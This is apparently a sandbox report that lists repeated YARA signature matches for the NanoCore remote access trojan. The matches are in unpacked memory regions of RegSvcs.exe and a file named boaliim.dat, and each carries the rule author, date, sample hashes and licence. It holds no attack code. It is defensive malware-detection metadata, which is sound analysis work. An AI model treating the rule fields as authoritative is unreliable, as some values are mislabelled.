Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
